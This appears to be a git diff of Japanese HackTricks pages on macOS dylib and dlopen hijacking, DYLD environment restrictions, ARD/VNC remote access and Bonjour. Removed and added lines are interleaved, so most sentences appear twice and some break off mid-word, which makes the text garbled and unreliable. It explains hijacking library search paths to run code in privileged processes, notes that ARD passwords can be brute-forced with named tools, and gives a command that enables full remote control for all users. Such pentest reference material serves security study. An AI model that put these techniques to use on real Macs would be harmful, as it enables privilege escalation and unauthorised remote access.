Windowsと同様に、MacOSでは**アプリケーションが任意のコードを実行するようにdylibsをハイジャックすることもできます**。\
しかし、**MacOS**アプリケーションがライブラリをロードする方法はWindowsよりも**制限されています**。これは、**マルウェア**開発者がまだこのテクニックを**ステルス**に使用できることを意味しますが、特権をエスカレートするためにこれを悪用する可能性ははるかに低いです。
Windowsと同様に、MacOSでも**dylibsをハイジャック**して、**アプリケーションが** **任意の** **コードを実行** **する** **ことができます**(実際には通常のユーザーでは`.app`バンドル内に書き込むためのTCC権限が必要かもしれません
ただし、**MacOS**アプリケーションがライブラリを読み込む方法は、Windowsよりも**制限が多い**ことを意味します。これは、**マルウェア**開発者がこのテクニックを**ステルス**に使用できる可能性があるが、特権を昇格させるためにこれを悪用する可能性は低いことを意味します。
まず、**MacOSバイナリがロードするライブラリの完全なパスを示すことがより一般的**です。そして二つ目に、**MacOSは$PATHのフォルダーをライブラリの検索には決して使用しません**
まず、**MacOSバイナリがライブラリを読み込む際に** **フルパス**を指定することが**一般的**です。そして、**MacOSは決して** **$PATH**のフォルダーをライブラリのために検索しません
この機能に関連する**コードの主要部分**は、`ImageLoader.cpp`の**`ImageLoader::recursiveLoadLibraries`**にあります。
この機能に関連する**コード****主要部分**は、`ImageLoader.cpp`の**`ImageLoader::recursiveLoadLibraries`**にあります。
machoバイナリがライブラリをロードするために使用できる**4つの異なるヘッダーコマンド**があります:
machoバイナリがライブラリを読み込むために使用できる**4つの異なるヘッダーコマンド**があります。
* **`LC_LOAD_DYLIB`**コマンドは、dylibをロードするための一般的なコマンドです。
* **`LC_LOAD_WEAK_DYLIB`**コマンドは前述のものと同様に機能しますが、dylibが見つからない場合は、エラーなしで実行が続行されます。
* **`LC_REEXPORT_DYLIB`**コマンドは、異なるライブラリからシンボルをプロキシ(または再エクスポート)します。
* **`LC_LOAD_UPWARD_DYLIB`**コマンドは、2つのライブラリが互いに依存している場合これを_上向きの依存関係_と呼びますに使用されます
- **`LC_LOAD_DYLIB`**コマンドは、dylibを読み込むための一般的なコマンドです。
- **`LC_LOAD_WEAK_DYLIB`**コマンドは、前のコマンドと同様に機能しますが、dylibが見つからない場合でもエラーなしで実行が続行されます。
- **`LC_REEXPORT_DYLIB`**コマンドは、異なるライブラリからシンボルをプロキシ(または再エクスポート)します。
- **`LC_LOAD_UPWARD_DYLIB`**コマンドは、お互いに依存する2つのライブラリがある場合に使用されますこれは_上向き依存性_と呼ばれます
しかし、**dylibハイジャックの2つのタイプ**があります:
ただし、**2種類のdylibハイジャッキング**があります。
* **欠落している弱いリンクされたライブラリ**:これは、アプリケーションが存在しないライブラリを**LC\_LOAD\_WEAK\_DYLIB**で設定されたライブラリをロードしようとすることを意味します。そして、**攻撃者が期待される場所にdylibを配置すると、それがロードされます**。
* リンクが"弱い"という事実は、ライブラリが見つからなくてもアプリケーションが実行を続ることを意味します。
* これに関連する**コード**は、`ImageLoaderMachO.cpp`の関数`ImageLoaderMachO::doGetDependentLibraries`にあり、`lib->required`は`LC_LOAD_WEAK_DYLIB`が真の場合にのみ`false`です。
* バイナリで**弱いリンクされたライブラリを見つける**には(後でハイジャックライブラリを作成する方法の例があります):
* ```bash
otool -l </path/to/bin> | grep LC_LOAD_WEAK_DYLIB -A 5 cmd LC_LOAD_WEAK_DYLIB
cmdsize 56
name /var/tmp/lib/libUtl.1.dylib (offset 24)
time stamp 2 Wed Jun 21 12:23:31 1969
current version 1.0.0
compatibility version 1.0.0
```
* **@rpathで設定されている**Mach-Oバイナリは、**`LC_RPATH`**と**`LC_LOAD_DYLIB`**というコマンドを持つことができます。これらのコマンドの**値**に基づいて、**ライブラリ**は**異なるディレクトリ**から**ロードされます**。
* **`LC_RPATH`**には、バイナリがライブラリをロードするために使用するいくつかのフォルダーのパスが含まれています。
* **`LC_LOAD_DYLIB`**には特定のライブラリをロードするためのパスが含まれています。これらのパスには**`@rpath`**が含まれていることがあり、これは**`LC_RPATH`**の値に置き換えられます。**`LC_RPATH`**に複数のパスがある場合、それぞれがライブラリのロードを検索するために使用されます。例:
* **`LC_LOAD_DYLIB`**に`@rpath/library.dylib`が含まれ、**`LC_RPATH`**に`/application/app.app/Contents/Framework/v1/`と`/application/app.app/Contents/Framework/v2/`が含まれている場合。両方のフォルダーが`library.dylib`のロードに使用されます**。**ライブラリが`[...]/v1/`に存在しない場合、攻撃者はそこに配置して、`[...]/v2/`のライブラリのロードをハイジャックすることができます。なぜなら、**`LC_LOAD_DYLIB`**のパスの順序に従っているからです。
* バイナリで**rpathパスとライブラリを見つける**には:`otool -l </path/to/binary> | grep -E "LC_RPATH|LC_LOAD_DYLIB" -A 5`
- **欠落している弱リンクされたライブラリ**:これは、アプリケーションが存在しないライブラリを**LC\_LOAD\_WEAK\_DYLIB**で構成して読み込もうとすることを意味します。その後、**攻撃者が期待される場所にdylibを配置すると読み込まれる**。
- リンクが「弱い」という事実は、ライブラリが見つからなくてもアプリケーションが実行を続行することを意味します。
- これに関連する**コード**は、`ImageLoaderMachO.cpp`の`ImageLoaderMachO::doGetDependentLibraries`関数にあり、`lib->required`は、`LC_LOAD_WEAK_DYLIB`がtrueの場合にのみ`false`です。
- バイナリ内の**弱リンクされたライブラリ**を検索するには(後でハイジャックライブラリを作成する例があります):
```bash
otool -l </path/to/bin> | grep LC_LOAD_WEAK_DYLIB -A 5 cmd LC_LOAD_WEAK_DYLIB
cmdsize 56
name /var/tmp/lib/libUtl.1.dylib (offset 24)
time stamp 2 Wed Jun 21 12:23:31 1969
current version 1.0.0
compatibility version 1.0.0
```
- **@rpath**で構成されたMach-Oバイナリには**`LC_RPATH`**と**`LC_LOAD_DYLIB`**コマンドが含まれる場合があります。これらのコマンドの値に基づいて、**異なるディレクトリからライブラリが読み込まれます**。
- **`LC_RPATH`**には、バイナリが使用するライブラリを読み込むために使用されるいくつかのフォルダーのパスが含まれます。
- **`LC_LOAD_DYLIB`**には、読み込む特定のライブラリへのパスが含まれます。これらのパスには**`@rpath`**が含まれる場合があり、**`LC_RPATH`**内の値で置換されます。**`LC_RPATH`**に複数のパスがある場合、すべてのパスが使用されてライブラリを検索します。例:
- **`LC_LOAD_DYLIB`**に`@rpath/library.dylib`が含まれ、**`LC_RPATH`**に`/application/app.app/Contents/Framework/v1/`と`/application/app.app/Contents/Framework/v2/`が含まれている場合。両方のフォルダーが`library.dylib`を読み込むために使用されます。ライブラリが`[...]/v1/`に存在しない場合、攻撃者はそこに配置して`[...]/v2/`のライブラリの読み込みをハイジャックできます。**`LC_LOAD_DYLIB`**内のパスの順序に従われます。
- バイナリ内の**rpathパスとライブラリ**を検索するには:`otool -l </path/to/binary> | grep -E "LC_RPATH|LC_LOAD_DYLIB" -A 5`
{% hint style="info" %}
**`@executable_path`**:メイン実行可能ファイルを含むディレクトリへの**パス**です。
**`@executable_path`****メイン実行ファイルを含むディレクトリ**への**パス**です。
**`@loader_path`**ロードコマンドを含む**Mach-Oバイナリ**を含む**ディレクトリ**への**パス**です。
**`@loader_path`****Mach-Oバイナリ**を含む**ディレクトリ**への**パス**です。
* 実行可能ファイルで使用される場合、**`@loader_path`**は実質的に**`@executable_path`**と**同じ**です。
* **dylib**で使用される場合、**`@loader_path`**は**dylib**への**パス**を提供します。
- **実行可能ファイル**で使用される場合、**`@loader_path`**は**実質的に** **`@executable_path`**と**同じ**です。
- **dylib**で使用される場合、**`@loader_path`**は**dylib**への**パス**を提供します。
{% endhint %}
この機能を悪用して**特権をエスカレートする方法**は、**rootによって実行されているアプリケーション**が攻撃者が書き込み権限を持っているフォルダーで何か**ライブラリを探している**場合に、まれに発生します。
この機能を悪用して特権を昇格させる方法は、**rootユーザーによって実行されているアプリケーションが、攻撃者が書き込み権限を持つフォルダーでライブラリを探している**珍しいケースです。
{% hint style="success" %}
アプリケーションで**欠落しているライブラリを見つける**ための素晴らしい**スキャナー**は[**Dylib Hijack Scanner**](https://objective-see.com/products/dhs.html)または[**CLIバージョン**](https://github.com/pandazheng/DylibHijack)です。\
このテクニックに関する**技術的詳細を含む素晴らしいレポート**は[**こちら**](https://www.virusbulletin.com/virusbulletin/2015/03/dylib-hijacking-os-x)で見つけることができます。
アプリケーション内の**欠落しているライブラリ**を見つけるための素敵な**スキャナー**は、[**Dylib Hijack Scanner**](https://objective-see.com/products/dhs.html)または[**CLIバージョン**](https://github.com/pandazheng/DylibHijack)です。
このテクニックに関する技術的な詳細を含む素敵な**レポート**は[**こちら**](https://www.virusbulletin.com/virusbulletin/2015/03/dylib-hijacking-os-x)で見つけることができます。
{% endhint %}
**例**
@ -125,15 +122,15 @@ compatibility version 1.0.0
[macos-dyld-hijacking-and-dyld\_insert\_libraries.md](../../macos-dyld-hijacking-and-dyld\_insert\_libraries.md)
{% endcontent-ref %}
## Dlopenハイジャッ
## Dlopenハイジャッキング
{% hint style="danger" %}
前述のライブラリ検証の制限もDlopenハイジャック攻撃を行うために**適用されることを覚えておいてください**
Dlopenハイジャッキング攻撃を実行するには、**前述のライブラリ検証制限**も適用されます
{% endhint %}
**`man dlopen`**から:
* パスに**スラッシュ文字が含まれていない場合**(つまり、単なるリーフ名場合)、**dlopen()は検索を行います**。**`$DYLD_LIBRARY_PATH`**が起動
- パスに**スラッシュ文字が含まれていない場合**(つまり、単なるリーフ名である場合)、**dlopen()は検索を行います**。**`$DYLD_LIBRARY_PATH`**が起動時に設定されている場合、dyldはまずそのディレクトリで検索します。次に、呼び出し元のmach-oファイルまたはメイン実行可能ファイルが**`LC_RPATH`**を指定している場合、dyldは**そのディレクトリで検索**します。次に、プロセスが**制限されていない**場合、dyldは**現在の作業
```c
// gcc dlopentest.c -o dlopentest -Wl,-rpath,/tmp/test
#include <dlfcn.h>
@ -176,29 +173,27 @@ fprintf(stderr, "Error loading: %s\n\n\n", dlerror());
return 0;
}
```
コンパイルして実行すると、**各ライブラリがどこで見つからなかったか**がわかります。また、**FSログをフィルタリング**することもできます:
コンパイルして実行すると、**各ライブラリが見つからなかった場所**がわかります。また、**FSログをフィルタリング**することもできます。
```bash
sudo fs_usage | grep "dlopentest"
```
## 相対パスハイジャック
**特権バイナリ/アプリ**例えばSUIDや強力な権限を持つバイナリなどが相対パスライブラリをロードしている場合`@executable_path` や `@loader_path` を使用している例)、かつ**ライブラリ検証が無効**になっている場合、攻撃者はバイナリを移動して相対パスでロードされるライブラリを変更し、プロセスにコードを注入することが可能になるかもしれません
**特権付きバイナリ/アプリ**たとえばSUIDまたは強力な権限を持つバイナリが**相対パス**ライブラリ(たとえば`@executable_path`や`@loader_path`を使用)をロードしており、かつ**ライブラリ検証が無効**になっている場合、バイナリを攻撃者が相対パスでロードされるライブラリを変更できる位置に移動し、そのライブラリを悪用してプロセスにコードをインジェクトする可能性があります
## `DYLD_*``LD_LIBRARY_PATH` 環境変数の削除
## `DYLD_*`および`LD_LIBRARY_PATH`環境変数を削除
ファイル `dyld-dyld-832.7.1/src/dyld2.cpp` には、**`pruneEnvironmentVariables`** という関数があり、**`DYLD_`** で始まるすべての環境変数と **`LD_LIBRARY_PATH=`** を削除します。
ファイル`dyld-dyld-832.7.1/src/dyld2.cpp`には、**`pruneEnvironmentVariables`** 関数があり、**`DYLD_`**で始まる環境変数と **`LD_LIBRARY_PATH=`** を削除します。
また、**suid****sgid** バイナリに対して、特に環境変数 **`DYLD_FALLBACK_FRAMEWORK_PATH`** と **`DYLD_FALLBACK_LIBRARY_PATH`** を**null**に設定します。
また、**suid**および**sgid**バイナリに対して、この関数は明示的に**`DYLD_FALLBACK_FRAMEWORK_PATH`**と**`DYLD_FALLBACK_LIBRARY_PATH`**を**null**に設定します。
この関数は、OSXをターゲットにした場合、同じファイルの **`_main`** 関数から呼び出されます。
この関数は、OSXをターゲットにしている場合、同じファイルの**`_main`** 関数から次のように呼び出されます:
```cpp
#if TARGET_OS_OSX
if ( !gLinkContext.allowEnvVarsPrint && !gLinkContext.allowEnvVarsPath && !gLinkContext.allowEnvVarsSharedCache ) {
pruneEnvironmentVariables(envp, &apple);
```
```markdown
そして、それらのブール値フラグはコード内の同じファイルで設定されています:
```
そして、これらのブールフラグはコード内の同じファイルで設定されています:
```cpp
#if TARGET_OS_OSX
// support chrooting from old kernel
@ -229,11 +224,11 @@ gLinkContext.allowClassicFallbackPaths = !isRestricted;
gLinkContext.allowInsertFailures = false;
gLinkContext.allowInterposing = true;
```
バイナリが**suid**または**sgid**である場合、ヘッダーに**RESTRICT**セグメントがある場合、または**CS\_RESTRICT**フラグで署名されている場合、**`!gLinkContext.allowEnvVarsPrint && !gLinkContext.allowEnvVarsPath && !gLinkContext.allowEnvVarsSharedCache`** が真であり、環境変数は削除されます。
これは、バイナリが**suid**または**sgid**であるか、ヘッダーに**RESTRICT**セグメントがあるか、**CS\_RESTRICT**フラグで署名されている場合、**`!gLinkContext.allowEnvVarsPrint && !gLinkContext.allowEnvVarsPath && !gLinkContext.allowEnvVarsSharedCache`**がtrueであり、環境変数が削除されることを意味します。
CS\_REQUIRE\_LVがの場合、変数は削除されませんが、ライブラリ検証は元のバイナリと同じ証明書を使用していることを確認します。
CS\_REQUIRE\_LVがtrueの場合、変数は削除されませんが、ライブラリ検証は元のバイナリと同じ証明書を使用していることを確認します。
## 制限の確認
## 制限のチェック
### SUID & SGID
```bash
@ -253,7 +248,7 @@ DYLD_INSERT_LIBRARIES=inject.dylib ./hello-restrict
```
### ハード化されたランタイム
キーチェーンで新しい証明書を作成し、それを使用してバイナリに署名します:
Keychain に新しい証明書を作成し、その証明書を使用してバイナリに署名します:
{% code overflow="wrap" %}
```bash
@ -278,25 +273,28 @@ DYLD_INSERT_LIBRARIES=inject.dylib ./hello-signed # Won't work
{% endcode %}
{% hint style="danger" %}
**`0x0(なし)`** のフラグで署名されたバイナリがあっても、実行時に動的に **`CS_RESTRICT`** フラグを取得することがあり、その場合この技術は機能しません。
`0x0(none)`フラグで署名されたバイナリがあっても、実行時に**`CS_RESTRICT`**フラグが動的に付与される可能性があるため、このテクニックはそれらのバイナリでは機能しません。
プロセスがこのフラグを持っているかどうかは、(こちらの [**csops**](https://github.com/axelexic/CSOps) を参照して)確認できます:
このフラグを持つprocをチェックすることができます[**ここでcsopsを取得**](https://github.com/axelexic/CSOps):&#x20;
```bash
csops -status <pid>
```
フラグ0x800が有効になっているかどうかを確認してください
そして、フラグ0x800が有効になっているかどうかをチェックします
{% endhint %}
# 参考文献
* [https://theevilbit.github.io/posts/dyld_insert_libraries_dylib_injection_in_macos_osx_deep_dive/](https://theevilbit.github.io/posts/dyld_insert_libraries_dylib_injection_in_macos_osx_deep_dive/)
<details>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには、</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をご覧ください!</strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team ExpertAWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
HackTricksをサポートする他の方法
* **HackTricksにあなたの会社を広告したい場合**、または**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手す
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックす
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**テレグラムグループ**](https://t.me/peass)に参加する、または**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**
* [**HackTricks**](https://github.com/carlospolop/hacktricks) および [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) githubリポジトリにPRを提出して、あなたのハッキングのコツを**共有する**
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を手に入れ
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つけ
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)で**フォロー**する
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください
</details>

40
macos-hardening/macos-security-and-privilege-escalation/macos-protocols.md
View file

@ -9,14 +9,14 @@ HackTricksをサポートする他の方法
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を手に入れる
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションをご覧ください
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォロー**してください。
* **ハッキングテクニックを共有するために、PRを** [**HackTricks**](https://github.com/carlospolop/hacktricks) **および** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **のGitHubリポジトリに提出してください。**
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**または[telegramグループ](https://t.me/peass)に**参加**するか、**Twitter**で私をフォローしてください 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **ハッキングトリックを共有するには、**[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。
</details>
## リモートアクセスサービス
これらはリモートでアクセスするための一般的なmacOSサービスです。\
これらはリモートでアクセスするための一般的なmacOSサービスです。\
これらのサービスは`システム設定` --> `共有`で有効/無効にできます。
* **VNC**、「Screen Sharing」として知られていますtcp:5900
@ -36,19 +36,19 @@ printf "\nThe following services are OFF if '0', or ON otherwise:\nScreen Sharin
```
### ARDのペンテスト
Apple Remote Desktop (ARD) は macOS 向けに追加機能を提供した [Virtual Network Computing (VNC)](https://en.wikipedia.org/wiki/Virtual_Network_Computing) の拡張版です。ARD の脆弱性の1つは、コントロール画面パスワードの認証方法で、パスワードの最初の8文字のみを使用するため、[Hydra](https://thudinh.blogspot.com/2017/09/brute-forcing-passwords-with-thc-hydra.html) [GoRedShell](https://github.com/ahhh/GoRedShell/) などのツールを使用した[総当たり攻撃](https://thudinh.blogspot.com/2017/09/brute-forcing-passwords-with-thc-hydra.html) に対して脆弱です。デフォルトのレート制限がないため、攻撃されやすくなります。
Apple Remote Desktop (ARD) は、macOS向けにカスタマイズされた[Virtual Network Computing (VNC)](https://en.wikipedia.org/wiki/Virtual_Network_Computing)の強化バージョンであり、追加機能を提供しています。 ARDの顕著な脆弱性は、制御画面パスワードの認証方法であり、パスワードの最初の8文字のみを使用するため、[Hydra](https://thudinh.blogspot.com/2017/09/brute-forcing-passwords-with-thc-hydra.html)や[GoRedShell](https://github.com/ahhh/GoRedShell/)などのツールを使用した[総当たり攻撃](https://thudinh.blogspot.com/2017/09/brute-forcing-passwords-with-thc-hydra.html)に対して脆弱性があります。デフォルトのレート制限がないため、攻撃が可能です。
脆弱なインスタンスは **nmap**`vnc-info` スクリプトを使用して特定できます。`VNC Authentication (2)` をサポートするサービスは、8文字のパスワード切り捨てにより、特に総当たり攻撃に対して脆弱です。
脆弱なインスタンスは、**nmap**の`vnc-info`スクリプトを使用して特定できます。`VNC Authentication (2)`をサポートするサービスは、8文字のパスワード切り捨てにより、特に総当たり攻撃に対して脆弱です。
特権昇格、GUI アクセス、ユーザーモニタリングなどのさまざまな管理タスクのために ARD を有効にするには、次のコマンドを使用します:
特権昇格、GUIアクセス、ユーザーモニタリングなどのさまざまな管理タスクのためにARDを有効にするには、次のコマンドを使用します
```bash
sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -allowAccessFor -allUsers -privs -all -clientopts -setmenuextra -menuextra yes
```
ARDは、観察、共有制御、フル制御など、多様な制御レベルを提供し、ユーザーパスワードの変更後もセッションが継続します。管理者ユーザーに対してUnixコマンドを直接送信し、rootとして実行することが可能です。タスクスケジューリングやリモートスポットライト検索などの機能があり、複数のマシンで機密ファイルをリモートで低影響で検索することが容易になります。
ARDは、観察、共有制御、フル制御など、さまざまな制御レベルを提供し、ユーザーパスワードの変更後もセッションが継続します。管理者ユーザーに対してUnixコマンドを直接送信し、rootとして実行することができます。タスクスケジューリングやリモートスポットライト検索などの機能があり、複数のマシンで機密ファイルをリモートで検索するのに役立ちます。
## Bonjourプロトコル
Bonjourは、Appleが設計した技術で、**同じネットワーク上のデバイスがお互いの提供するサービスを検出**できるようにします。Rendezvous、**Zero Configuration**、またはZeroconfとしても知られ、デバイスがTCP/IPネットワークに参加し、**自動的にIPアドレスを選択**し、そのサービスを他のネットワークデバイスにブロードキャストできるようにします。
Bonjourは、Appleが設計した技術で、**同じネットワーク上のデバイスがお互いの提供するサービスを検出**できます。Rendezvous、Zero Configuration、またはZeroconfとしても知られ、デバイスがTCP/IPネットワークに参加し、**自動的にIPアドレスを選択**し、そのサービスを他のネットワークデバイスにブロードキャストできるようにします。
Bonjourによって提供されるZero Configuration Networkingにより、デバイスは次のことができます
* **DHCPサーバーが存在しなくてもIPアドレスを自動的に取得**する。
@ -61,9 +61,9 @@ BonjourはDNSにおいて、**マルチキャストDNSmDNSプロトコル*
ネットワークに参加すると、各デバイスは通常、ホスト名から派生した名前またはランダムに生成された名前で終わる名前を自己選択します。
ネットワーク内でのサービス検出は、**DNS Service DiscoveryDNS-SD**によって容易になります。DNS SRVレコードの形式を活用するDNS-SDは、**DNS PTRレコード**を使用して複数のサービスのリストを可能にします。特定のサービスを求めるクライアントは、`<Service>.<Domain>`のPTRレコードをリクエストし、サービスが複数のホストから利用可能な場合は、`<Instance>.<Service>.<Domain>`としてフォーマットされたPTRレコードのリストを受け取ります。
ネットワーク内でのサービス検出は、**DNS Service DiscoveryDNS-SD**によって容易になります。DNS SRVレコードの形式を活用するDNS-SDは、**DNS PTRレコード**を使用して複数のサービスをリスト化します。特定のサービスを求めるクライアントは、`<Service>.<Domain>`のPTRレコードをリクエストし、サービスが複数のホストから利用可能な場合は、`<Instance>.<Service>.<Domain>`としてフォーマットされたPTRレコードのリストを受け取ります。
**dns-sd**ユーティリティを使用して、**ネットワークサービスの検出と広告**が行えます。以下はその使用例です:
**`dns-sd`ユーティリティ**を使用して、ネットワークサービスの**検出と広告**が行えます。以下はその使用例です:
### SSHサービスの検索
@ -71,7 +71,7 @@ BonjourはDNSにおいて、**マルチキャストDNSmDNSプロトコル*
```bash
dns-sd -B _ssh._tcp
```
このコマンドは、_ssh._tcp サービスのブラウジングを開始し、タイムスタンプ、フラグ、インターフェース、ドメイン、サービスタイプ、およびインスタンス名などの詳細を出力します。
このコマンドは、_ssh._tcpサービスのブラウジングを開始し、タイムスタンプ、フラグ、インターフェース、ドメイン、サービスタイプ、およびインスタンス名などの詳細を出力します。
### HTTPサービスの広告
@ -81,15 +81,15 @@ dns-sd -R "Index" _http._tcp . 80 path=/index.html
```
このコマンドは、ポート80で`/index.html`のパスを持つHTTPサービスを「Index」という名前で登録します。
その後、ネットワーク上でHTTPサービスを検索するには:
その後、ネットワーク上でHTTPサービスを検索するには
```bash
dns-sd -B _http._tcp
```
サービスが開始されると、その存在をマルチキャストしてサブネット上のすべてのデバイスに通知します。これらのサービスに興味を持つデバイスはリクエストを送信する必要はありませんが、単にこれらのアナウンスを聞くだけです。
サービスが開始ると、その存在をマルチキャストしてサブネット上のすべてのデバイスに通知します。これらのサービスに興味を持つデバイスはリクエストを送信する必要はありませんが、これらのアナウンスを受信するだけで済みます。
よりユーザーフレンドリーなインターフェースのために、Apple App Storeで利用可能な****Discovery - DNS-SD Browser**アプリを使用すると、ローカルネットワークで提供されているサービスを視覚化できます。
よりユーザーフレンドリーなインターフェースのために、Apple App Storeで入手可能な**Discovery - DNS-SD Browser**アプリを使用すると、ローカルネットワークで提供されているサービスを視覚化できます。
また、`python-zeroconf`ライブラリを使用してサービスをブラウズおよび検出するためのカスタムスクリプトを作成することもできます。[**python-zeroconf**](https://github.com/jstasiak/python-zeroconf)スクリプトは、`_http._tcp.local.`サービス用のサービスブラウザを作成し、追加または削除されたサービスを出力します。
また、`python-zeroconf`ライブラリを使用してサービスをブラウズおよび検出するためのカスタムスクリプトを作成することもできます。[**python-zeroconf**](https://github.com/jstasiak/python-zeroconf)スクリプトは、`_http._tcp.local.`サービス用のサービスブラウザの作成をデモし、追加または削除されたサービスを出力します。
```python
from zeroconf import ServiceBrowser, Zeroconf
@ -111,7 +111,7 @@ finally:
zeroconf.close()
```
### Bonjourの無効化
セキュリティ上の懸念やその他の理由からBonjourを無効にする必要がある場合は、次のコマンドを使用してオフにすることができます:
セキュリティ上の懸念やその他の理由からBonjourを無効にする必要がある場合は、次のコマンドを使用してオフにすることができます
```bash
sudo launchctl unload -w /System/Library/LaunchDaemons/com.apple.mDNSResponder.plist
```
@ -127,10 +127,10 @@ sudo launchctl unload -w /System/Library/LaunchDaemons/com.apple.mDNSResponder.p
HackTricks をサポートする他の方法:
* **HackTricks で企業を宣伝したい** または **HackTricks をPDFでダウンロードしたい場合は** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェックしてください!
* **HackTricks で企業を宣伝したい** または **HackTricks をPDFでダウンロードしたい** 場合は [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェックしてください!
* [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)、当社の独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) コレクションを発見す
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f) または [**telegramグループ**](https://t.me/peass) に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) をフォローする
* **HackTricks** と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) のコレクションを見つけ
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f) に参加するか、[**telegramグループ**](https://t.me/peass) に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) をフォローする
* **HackTricks** と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する
</details>

84
macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md
View file

@ -1,24 +1,24 @@
# macOS セキュリティ保護
# macOSセキュリティ保護
<details>
<summary><strong>AWS ハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong></strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>でゼロからヒーローまでAWSハッキングを学ぶ</strong></a><strong></strong></summary>
HackTricks をサポートする他の方法:
HackTricksをサポートする他の方法:
* **HackTricks にあなたの会社を広告掲載したい場合**や**HackTricks を PDF でダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式 PEASS & HackTricks グッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFT**](https://opensea.io/collection/the-peass-family)コレクションをチェックす
* 💬 [**Discord グループ**](https://discord.gg/hRep4RUj7f)や [**telegram グループ**](https://t.me/peass)に**参加する**か、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
* [**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) の GitHub リポジトリに PR を提出して、あなたのハッキングのコツを**共有する**。
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見
- 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で私をフォローする 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
- ハッキングトリックを共有するために、[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出する
</details>
## Gatekeeper
Gatekeeper は通常、**Quarantine + Gatekeeper + XProtect** の組み合わせを指し、これら 3 つの macOS セキュリティモジュールが**ダウンロードされた潜在的に悪意のあるソフトウェアの実行を防ぐ**ことを試みます
